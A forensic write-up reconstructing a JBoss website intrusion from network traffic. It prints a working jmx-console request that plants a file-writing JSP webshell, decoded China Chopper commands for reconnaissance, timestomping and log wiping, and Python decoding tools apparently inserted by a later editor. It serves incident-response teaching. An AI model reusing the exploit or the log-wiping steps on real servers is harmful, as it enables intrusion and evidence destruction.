Chaitin Baichuan Cloud (长亭百川云)

An intrusion traceback: fully reconstructing the attacker's actions from network traffic

InBug Lab


2024-07-13

Background

In June 2021, a key image on one organisation's system was found to have been tampered with, and the website was suspected of having been compromised.

Information collected

From the security awareness platform, the attack-behaviour logs for the previous two days were exported: 1,097 entries after processing.

From the full-traffic capture system, the packet capture for the day of the attack was exported: 101,801,984 bytes (97 MB) of packets after processing.

Reconstructing the intrusion

Since an image had been tampered with, we opened the web page, copied the image link and noted the image file name. The likely tampering workflow is: download the image, edit it to add a watermark, then upload it to replace the copy on the server. Searching the attack-behaviour logs for the file name "logo.gif" returned the two log entries below, from which we learn that /August/August.jsp operated on this image. (An experienced analyst may already see from these two lines that August.jsp is a China Chopper (菜刀) webshell.)

Attacker attempted an attack against: x.x.x.x:9090/August/August.jsp, attack payload: a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

Next, search the traffic for August.jsp: the packets around its first appearance may include the request that uploaded the shell. Open the capture in Wireshark, filter with http contains "August.jsp" to obtain the source and destination IPs, narrow the search further, and Follow HTTP Stream on the first hit.

After URL decoding we obtain the content of August.jsp. (Clearly, August.jsp is a China Chopper webshell.)

Filter with http.request.method=="POST" and http.request.uri=="/August/August.jsp" and reconstruct the whole attack step by step from the POST parameters in the traffic. The extracted requests are listed below. (Many environments do not keep full packet captures; the same POST parameters can be exported from a security device that logs request bodies, such as a WAF.)

To understand which operation each set of parameters corresponds to, the shell itself has to be analysed. Roughly: in a=B, the parameter name a is the shell's password, and the value B dispatches to the shell's BB function; a=M dispatches to the MM function, and so on. z0 is the character set the shell uses to decode the remaining arguments, and z1/z2 are the arguments of the operation. We then went through every XX function to determine what it does. Summarised for the opcodes that appear in the captured requests:

a=A     // list roots
a=C     // read a file (z1 = path)
a=D     // write text to a file (z1 = path, z2 = content)
a=E     // delete a file or directory (z1 = path)
a=F     // download a file (z1 = path)
a=G     // write hex-encoded content to a file (z1 = path, z2 = hex bytes)
a=H     // copy a file (z1 = source, z2 = destination)
a=I     // rename/move a file (z1 = source, z2 = destination)
a=K     // set a file's last-modified time (z1 = path, z2 = timestamp)
a=M     // execute a command (z1 = "-c/bin/sh", z2 = command line)

Once the shell has been analysed, the attack steps can easily be reconstructed from the request parameters sent to it in the traffic. A number of directory-browsing operations in between have been omitted.
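The dispatch described above (password parameter name, single-letter opcode, z0 charset, z1/z2 arguments) can be turned into a small decoder that rebuilds the timeline from raw POST bodies. The following is an added example written for this edit, not code from the original post or from InBug Lab; the opcode meanings are the ones established by the request/result pairs on this page, and the sample bodies are copied from those requests (the hex in the G request is the truncated prefix shown on the page). The function and field names, and the command-wrapper regex, are my own choices.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

PASSWORD_PARAM = "a"  # the "password": name of the parameter whose value selects the opcode

# opcode -> (function inside the shell, what it does). Only opcodes whose meaning is
# established by the captured requests on this page are listed; anything else is
# reported as unknown rather than guessed.
OPCODES = {
    "A": ("AA", "list roots"),
    "C": ("CC", "read file"),
    "D": ("DD", "write text to file"),
    "E": ("EE", "delete file or directory"),
    "F": ("FF", "download file"),
    "G": ("GG", "write hex-encoded bytes to file"),
    "H": ("HH", "copy file"),
    "I": ("II", "rename/move file"),
    "K": ("KK", "set last-modified time"),
    "M": ("MM", "execute command"),
}

# The M opcode wraps the real command as: cd "<dir>";<cmd>;echo [S];pwd;echo [E]
CMD_WRAPPER = re.compile(
    r'^cd "(?P<cwd>[^"]*)";(?P<cmd>.*);echo \[S\];pwd;echo \[E\]$', re.S)

# Cheap triage shape: some parameter whose value is a single uppercase letter.
CHOPPER_SHAPE = re.compile(r"(?:^|&)\w+=[A-Z](?=&|$)")


@dataclass
class ChopperEvent:
    opcode: str
    function: str
    operation: str
    detail: str
    params: dict = field(default_factory=dict)


def looks_like_chopper(body: str) -> bool:
    """Shape check usable as a WAF/SIEM pre-filter before full decoding."""
    return bool(CHOPPER_SHAPE.search(body)) and "z0=" in body


def decode_request(body: str) -> ChopperEvent:
    """Decode one captured POST body into the operation the shell performed."""
    # z0 names the charset the shell uses for z1/z2; read it first, then re-parse
    # with it so non-ASCII paths and commands decode the way the shell saw them.
    charset = parse_qs(body, keep_blank_values=True).get("z0", ["utf-8"])[0]
    params = {k: v[0] for k, v in
              parse_qs(body, keep_blank_values=True, encoding=charset).items()}
    opcode = params.get(PASSWORD_PARAM, "")
    z1, z2 = params.get("z1", ""), params.get("z2", "")
    function, operation = OPCODES.get(opcode, ("??", "unknown opcode"))

    if opcode == "M":
        # MM builds argv as {z1[2:], z1[:2], z2}: "-c/bin/sh" -> /bin/sh -c <z2>
        shell, flag = z1[2:], z1[:2]
        m = CMD_WRAPPER.match(z2)
        cmd = m.group("cmd") if m else z2
        detail = f"{shell} {flag} '{cmd}'" + (f" (cwd {m.group('cwd')})" if m else "")
    elif opcode in ("H", "I"):
        detail = f"{z1} -> {z2}"
    elif opcode == "K":
        detail = f"{z1} mtime := {z2}"
    elif opcode == "D":
        detail = f"{z1} <- {z2!r}"
    elif opcode == "G":
        try:
            data = bytes.fromhex(z2)
            magic = "GIF89a" if data.startswith(b"GIF89a") else "other"
            detail = f"{z1} <- {len(data)} bytes (magic: {magic})"
        except ValueError:  # truncated capture or non-hex payload
            detail = f"{z1} <- (undecodable hex)"
    else:
        detail = z1
    return ChopperEvent(opcode, function, operation, detail, params)


def timeline(bodies):
    """One human-readable line per request, in capture order."""
    return [f"{e.opcode}/{e.function} {e.operation}: {e.detail}"
            for e in map(decode_request, bodies)]


# Sample bodies copied from the captured requests on this page.
SAMPLE_BODIES = [
    "a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bid%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D",
    "a=H&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp",
    "a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp&z2=2008-07-19+02%3A21%3A04",
    "a=G&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif&z2=474946383961E8036900F7000000",
    "a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log&z2=122",
]

if __name__ == "__main__":
    for line in timeline(SAMPLE_BODIES):
        print(line)
```

Feeding the exported POST bodies (from the pcap or from a WAF that logs request bodies) into timeline() yields the same table as below, and looks_like_chopper() is the kind of shape rule that would have flagged these requests before the image was noticed.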

Request parameters, each followed by the analysis result:

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bid%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

Executes the command [id]

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bnetstat+-ano%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

Executes the command [netstat -ano]

a=H&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp

Copies /usr/local/jboss/server/default/./deploy/management/August.war/August.jsp to /usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp

a=I&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp

Renames /usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp to test.jsp

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp&z2=2008-07-19+02%3A21%3A04

Sets the last-modified time of /usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/test.jsp to 2008-07-19 02:21:04 (timestomping, so the dropped file no longer stands out in a listing sorted by date)

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war&z2=2008-07-19+02%3A22%3A10

Sets the last-modified time of /usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war to 2008-07-19 02:22:10

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war&z2=2021-06-25+16%3A10%3A58

Sets the last-modified time of /usr/local/jboss/server/default/./deploy/management/August.war to 2021-06-25 16:10:58

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=2021-06-25+16%3A10%3A58

Sets the last-modified time of /usr/local/jboss/server/default/./deploy/management/August.war/August.jsp to 2021-06-25 16:10:58

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2Fshell.jsp&z2=2021-06-25+16%3A10%3A58

Sets the last-modified time of /usr/local/jboss/server/default/./deploy/management/August.war/shell.jsp to 2021-06-25 16:10:58

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bps+aux%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

Executes the system command [ps aux]

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log

Reads /usr/local/jboss/server/default/./log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=1

Writes "1" to /usr/local/jboss/server/default/./log/server.log (overwriting the current log)

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log.2021-06-20

Reads /usr/local/jboss/server/default/./log/server.log.2021-06-20

a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp

Downloads /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp

Deletes /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Findex.html

Reads /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/index.html

a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

Downloads /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif (the original image)

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

Deletes /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif

a=G&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif&z2=474946383961E8036900F7000000...

Writes hex-encoded data to /usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif (the hex begins with 474946383961, i.e. "GIF89a": this is the replacement image being uploaded)

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjmx-console.war

Deletes /usr/local/jboss/server/default/./deploy/jmx-console.war

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war

Deletes /usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fjbossjdk.war

Deletes /usr/local/jboss/server/default/./deploy/management/jbossjdk.war

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log

Reads /usr/local/jboss/server/default/log/server.log

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log

Reads /usr/local/jboss/server/default/log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log&z2=122

Writes "122" to /usr/local/jboss/server/default/log/server.log

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-20

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-20

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-21

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-21

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-22

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-22

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-23

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-23

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-24

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-24

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-25

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-25

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-26

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-26

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-27

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-27

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-28

Deletes /usr/local/jboss/server/default/log/server.log.2021-06-28

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2Fjbossjdk

Deletes /usr/local/jboss/server/default/./work/jboss.web/localhost/jbossjdk (the web container's work directory, where compiled JSP classes are cached)

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2F_

Deletes /usr/local/jboss/server/default/./work/jboss.web/localhost/_

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2FAugust

Deletes /usr/local/jboss/server/default/./work/jboss.web/localhost/August

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log

Reads /usr/local/jboss/server/default/./log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=12

Writes "12" to /usr/local/jboss/server/default/./log/server.log

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war

Deletes /usr/local/jboss/server/default/./deploy/management/August.war

By this point it should be clear that an August.war existed, and that shell.jsp sat in the August directory, so shell.jsp must have been inside that war. What was the content of shell.jsp?

From the earlier request packet that wrote August.jsp we can infer that shell.jsp's function was simply writing files. Its content can also be recovered from the traffic: in Wireshark, filter with http contains "August.war" and look at the first hit.

After URL decoding:

/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True

A Google search for this URL shows which vulnerability the attacker exploited: the JBoss jmx-console HtmlAdaptor was reachable and accepted an invokeOpByName call to the store operation of the jboss.admin:service=DeploymentFileRepository MBean, which writes an arbitrary file into the deployment directory (here August.war/shell.jsp under deploy/management, matching the paths seen above). arg3 is the content of shell.jsp.

At this point the whole chain is clear: which vulnerability the attacker came in through, how the image was replaced, then the removal of the webshell and the wiping of the logs...
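To make concrete what the HtmlAdaptor URL tells an analyst, here is an added example (written for this edit, not code from the original post) that parses an invokeOpByName query back into the MBean call, derives the file it dropped and lists the request parameters that dropped file reads. The sample query is the page's decoded URL re-encoded as it would have to appear on the wire (the "+" inside the JSP becomes %2B, which is my reconstruction); the argument meanings (folder, base name, extension, content, flag) are read off the URL itself.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The page's HtmlAdaptor request, re-encoded as it would travel on the wire
# (constructed for this example from the decoded URL shown in the article).
SAMPLE_URL = (
    "/jmx-console//HtmlAdaptor?action=invokeOpByName"
    "&name=jboss.admin:service=DeploymentFileRepository&methodName=store"
    "&argType=java.lang.String&arg0=August.war"
    "&argType=java.lang.String&&arg1=shell"
    "&argType=java.lang.String&arg2=.jsp"
    "&argType=java.lang.String&arg3=%3C%25+if%28request.getParameter%28%22f%22%29"
    "%21%3Dnull%29%28new+java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29"
    "%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29"
    ".getBytes%28%29%29%3B+%25%3E"
    "&argType=boolean&arg4=True"
)

ARG_KEY = re.compile(r"arg(\d+)")


def parse_invoke(url: str) -> dict:
    """Rebuild the MBean operation from an invokeOpByName query string.

    argType entries are positional and pair up with arg0, arg1, ... in order,
    so the query must be read as an ordered list, not collapsed into a dict
    (parse_qsl also skips the empty "&&" segment present in the capture).
    """
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    fields = dict(pairs)                      # last value wins for scalar keys
    types = [v for k, v in pairs if k == "argType"]
    args = {}
    for k, v in pairs:
        m = ARG_KEY.fullmatch(k)
        if m:
            args[int(m.group(1))] = v
    return {
        "path": parts.path,
        "action": fields.get("action"),
        "mbean": fields.get("name"),
        "method": fields.get("methodName"),
        "args": [(types[i] if i < len(types) else "?", args[i]) for i in sorted(args)],
    }


def dropped_file(call: dict):
    """For DeploymentFileRepository.store(folder, name, ext, data, flag), return
    (path relative to the repository's base directory, file content); else None."""
    if (not (call.get("mbean") or "").endswith("DeploymentFileRepository")
            or call.get("method") != "store" or len(call.get("args", [])) < 4):
        return None
    folder, name, ext, data = (v for _, v in call["args"][:4])
    return f"{folder}/{name}{ext}", data


def dropper_params(jsp: str):
    """Request parameters a dropped JSP reads: its command interface.

    For the page's shell.jsp this gives f (target file name under the web root)
    and t (bytes to write), which is exactly how August.jsp was written next.
    """
    return sorted(set(re.findall(r'request\.getParameter\("(\w+)"\)', jsp)))


if __name__ == "__main__":
    call = parse_invoke(SAMPLE_URL)
    print(call["mbean"], call["method"], [t for t, _ in call["args"]])
    path, content = dropped_file(call)
    print("dropped:", path)
    print("reads params:", dropper_params(content))
```

Running the same parser over every HtmlAdaptor request in a capture, not just the first, is the quick way to confirm no second file was stored through the same MBean.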

Recovering the tampered file

The original file has been deleted from the server, but it can be recovered from the traffic. Using the Chopper parameters analysed earlier, filter the capture with http contains "a=F" and http contains "logo.gif" to find the request in which the image was downloaded.

Narrow it further with http contains "->|GIF89a" and http.response, then Copy → ...as a Hex Stream.

You can paste the hex stream into a hex editor such as UltraEdit (UE) or WinHex. Here is an alternative: paste it into a .txt file and delete everything up to and including 2d3e7c (->|) and everything from 7c3c2d (|<-) onward.

Then use the following code to convert it into a binary file:

import sys

Packaging it into an .exe with PyInstaller is even more convenient: drag the .txt onto the .exe and the binary file is produced.
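The manual steps above (cut everything before 2d3e7c and after 7c3c2d, then hex-decode) can be automated so that the framing is located only on byte-aligned offsets (a plain text search for 2d3e7c can hit a match that straddles two bytes) and the carved file is sanity-checked against the GIF header. This is an added example written for this edit, not the author's script; the sample HTTP response is constructed here, and its GIF bytes are the prefix shown in the G request on this page, so the carved original can be compared directly with what the attacker uploaded.

```python
import sys

START, END = b"->|", b"|<-"   # China Chopper frames every response body this way


def find_aligned(hexstr: str, needle: bytes, last: bool = False) -> int:
    """Offset (in hex characters) of `needle` on an even boundary, or -1.

    Searching the hex text for "2d3e7c" directly can match across a byte
    boundary (e.g. bytes a2 d3 e7 c0 contain it at offset 1), so only even
    offsets are accepted. With last=True the final aligned hit is returned.
    """
    pattern = needle.hex()
    pos, start = -1, 0
    while True:
        i = hexstr.find(pattern, start)
        if i < 0:
            return pos
        if i % 2 == 0:
            pos = i
            if not last:
                return pos
        start = i + 1


def carve_response(hex_stream: str) -> bytes:
    """Bytes between the first '->|' and the last '|<-' of a Wireshark
    'Copy as Hex Stream' dump (whitespace and upper-case hex tolerated)."""
    h = "".join(hex_stream.split()).lower()
    s = find_aligned(h, START)
    e = find_aligned(h, END, last=True)
    if s < 0 or e < 0 or e <= s:
        raise ValueError("chopper framing ->| ... |<- not found")
    return bytes.fromhex(h[s + len(START.hex()):e])


def gif_dimensions(data: bytes):
    """(width, height) from the GIF logical screen descriptor, or None."""
    if len(data) < 10 or data[:6] not in (b"GIF89a", b"GIF87a"):
        return None
    return (int.from_bytes(data[6:8], "little"), int.from_bytes(data[8:10], "little"))


# Constructed sample: an HTTP response carrying a chopper-framed file download.
# The GIF bytes are the prefix the attacker wrote with the G opcode on this page.
_GIF_PREFIX = bytes.fromhex("474946383961E8036900F7000000")
SAMPLE_HEX = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    + START + _GIF_PREFIX + b"\x00\x3b" + END
).hex()


def main(argv):
    if len(argv) != 3:
        print(f"usage: {argv[0]} hexstream.txt out.bin", file=sys.stderr)
        return 2
    with open(argv[1]) as f:
        data = carve_response(f.read())
    with open(argv[2], "wb") as f:
        f.write(data)
    dims = gif_dimensions(data)
    print(f"wrote {len(data)} bytes", f"GIF {dims[0]}x{dims[1]}" if dims else "(not a GIF)")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The header prefix on this page decodes to a 1000x105 GIF89a; checking the carved file's dimensions against the replacement's is a cheap way to confirm you recovered the right object and not, say, a truncated stream.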

Appendix: annotated China Chopper shell

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>

InBug Lab

Official site: https://www.inbug.org/

InScan intranet scanner: https://github.com/inbug-team/InScan

Copyright ©2024 Beijing Chaitin Technology Co., Ltd.